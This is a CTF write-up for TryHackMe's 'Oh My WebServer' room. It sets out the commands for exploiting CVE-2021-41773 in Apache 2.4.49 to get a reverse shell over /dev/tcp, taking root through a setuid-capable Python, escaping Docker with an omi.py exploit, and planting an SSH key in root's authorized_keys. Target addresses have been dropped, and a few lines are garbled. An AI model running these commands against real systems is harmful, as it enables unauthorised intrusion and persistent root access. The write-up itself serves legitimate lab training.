Oh My WebServer – Walkthrough En | TryHackMe – Write-up

Can you root me?


Oh My WebServer is a CTF medium from TryHackme. You have to exploit a well-known flaw in Apache 2.4.49 and then escape from Docker.



Command :

nmap -T5 -p- -sVC

On port 80, there is Apache 2 running with version 2.4.49. There is a well known and easy to exploit vulnerability. CVE-2021-41773 


Initial Foothold

Exploiting this flaw is very simple. Just make a curl request to /cgi-bin to get a reverse shell.

Command :

curl -v ‘’ -d ‘echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/ 0>&1’ -H “Content-Type: text/plain”

Lateral movement - daemon to root

We land in a Docker container as we can see with the command ls -al /



python3.7 a des capabilities setuid.

Command :

getcap -r 2>/dev/null

The gtfobins web site gives us a way to use this configuration to switch to the root account.

Command :

/usr/bin/python3.7 -c ‘import os; os.setuid(0); os.system(“/bin/sh”)’

Privilege Escalation

In the /tmp folder is an omi.py file. It is thanks to this that one has the possibility of leaving the container and obtaining root rights.

Command :

/usr/bin/python3.7 omi.py -t -c ‘cat /root/flag.txt’

Sorry, the capture is not complete on command line. 

SSH connection

It is also possible to insert a public key in the file /root/.ssh/authorized_keys

Command to create a private/public key pair: :


Commande :

usr/bin/python3.7 omi.py -t -c ‘echo public key here’ >> /root/.ssh/authorized_keys

Then connect with this command :

ssh root@ -i id_rsa


That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article.